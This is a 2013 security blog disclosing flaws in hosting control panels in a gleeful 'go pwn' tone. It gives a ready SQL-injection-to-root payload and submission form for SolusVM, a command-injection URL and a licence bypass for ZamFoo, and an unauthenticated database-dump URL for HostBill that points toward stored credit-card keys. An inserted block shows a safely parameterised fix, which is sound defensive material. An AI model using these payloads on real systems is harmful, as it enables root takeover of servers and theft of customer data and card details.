localhost
Random ramblings from someone working in InfoSec

contact me@localhost.re
2013/06/16

[image: lolololo]

Starting this post with that image seemed appropriate. This one is really easy, and lots of servers use this crap called SolusVM.

/centralbackup.php:

<?php
if ($_POST['delete']) {
    // $_POST['deleteid'] is concatenated straight into the query: SQL injection
    $xc = $db -> query('SELECT * FROM centralbackup WHERE id = \'' . $_POST['deleteid'] . '\'', true);
    #[...]
    if ($xc[status] == 'failed') {
        // columns of the (attacker-controlled) row go unquoted into a shell command
        exec('php /usr/local/solusvm/system/bus.php -- --comm=deletebackup --serverid=' . $xc['bserver'] . ' --nodeid=' . $vdata['nodeid'] . ' --vserverid=' . $vdata['vserverid'] . ' --filename=' . $xc['filename']);
    #[...]
    }
}
?>

So what do we have here? SQL injection? Yup! exec() on the result? Yup! A vulnerable setuid binary that gets you uid 0? Yup!
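For contrast, here is what a fixed version of that handler would look like. This is an added example, not SolusVM's code; it assumes a PDO connection in $pdo, a $vdata array already holding the caller's own nodeid/vserverid, and the column names used above.

```php
<?php
// Added example, not SolusVM's code. Assumes a PDO connection in $pdo and
// a $vdata array with the caller's own nodeid/vserverid (both hypothetical).
function deleteFailedBackup(PDO $pdo, array $vdata, $deleteId)
{
    // 1. Only a numeric id may reach the query; anything else is rejected early.
    if (!ctype_digit((string) $deleteId)) {
        return false;
    }

    // 2. Parameterised query: the id is bound, never concatenated into SQL.
    $stmt = $pdo->prepare(
        'SELECT bserver, filename, status FROM centralbackup WHERE id = :id'
    );
    $stmt->execute([':id' => (int) $deleteId]);
    $xc = $stmt->fetch(PDO::FETCH_ASSOC);

    // 3. Quoted array keys; the status check still gates the delete.
    if ($xc === false || $xc['status'] !== 'failed') {
        return false;
    }

    // 4. Allow-list the filename: no shell metacharacters, no path traversal.
    if (!preg_match('/\A[A-Za-z0-9._-]+\z/', $xc['filename'])
        || strpos($xc['filename'], '..') !== false) {
        return false;
    }

    // 5. Every argument is shell-quoted individually, even after validation.
    $cmd = 'php /usr/local/solusvm/system/bus.php -- --comm=deletebackup'
         . ' --serverid=' . escapeshellarg((string) $xc['bserver'])
         . ' --nodeid=' . escapeshellarg((string) $vdata['nodeid'])
         . ' --vserverid=' . escapeshellarg((string) $vdata['vserverid'])
         . ' --filename=' . escapeshellarg($xc['filename']);
    exec($cmd, $output, $rc);
    return $rc === 0;
}

if (isset($_POST['delete'], $_POST['deleteid'])) {
    deleteFailedBackup($pdo, $vdata, $_POST['deleteid']);
}
```

A real fix also has to tie the selected row to the logged-in user (the column for that is not shown on this page), and the quoting only stops the injection at this layer: a setuid helper that executes arbitrary strings as root, as the post describes for solusvmc-node, stays exploitable by any other caller that reaches it.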

Let's exploit this, shall we? It's easy, I promise! 3 easy steps!

  • Get yourself an active user with an active VM
  • Log in, click on the VM, copy the GET _v value
  • POST to /centralbackup.php?_v=[value]

delete=1&deleteid=-1' union select 0,0,0,0,0,'failed',';/usr/local/solusvm/core/solusvmc-node --ebtables ";command to run as root";',0#

Or just use this fancy HTML form:

<html><body>
    <script>
    function construct() {
        var sql='-1\' union select 0,0,0,0,0,\'failed\',\';/usr/local/solusvm/core/solusvmc-node --ebtables ";'+document.forms['form']['deleteid'].value+'";\',0#';
        document.forms['form']['deleteid'].value=sql;
        return true;
    }
    </script>
    <form name='form' method='post' action='http://CHANGE_ME:5353/centralbackup.php?_v=CHANGE_ME' onsubmit="return construct();">
    <input type='hidden' name='delete' value='1'>
    CMD: <input type='text' name='deleteid' size='100'>
    <br><input type='submit'>
    </form>
</body></html>

And, as a bonus, here's something to help you pwn. Just wget it to /usr/local/solusvm/www/rofl.php

It can run a command on all nodes, show decrypted passwords for all the users, etc.

go go go

Have fun!

2013/06/15

Soo... I've been following a thread on Webhostingtalk where two security researchers are trying to get a vulnerability patched.

Well, in like 5 minutes, I found the little bugger. And since the original researchers have decided not to release it... here is mine :)

All you need to do is request this URL as a reseller, inserting the command you wish to run, and it will be executed as root.

/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=account&date=`command`

Pretty slick. The new patch out today is still vulnerable as well.

must see

BTW, you can basically null this software and access all of the cgi files except the main menu by adding this to your /etc/hosts file:

127.0.0.1 zamfoo.com www.zamfoo.com

2013/05/29

Another day, another billing panel. Found a sweet vulnerability in HostBill "Security is critical".

Entire database dump written to a file of our choice. Super-duper validation of access level (none).

/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0

must see

You can also use POST.

Oh, and if you really wanted to, you can modify your client name or something to <?php eval(...); ?> and set the filename extension to php. Credit cards are stored in the database; the encryption key is in /includes/config.php.

PS: In case you wanted to report this vulnerability to them, it costs only $75. There is no other way to contact them.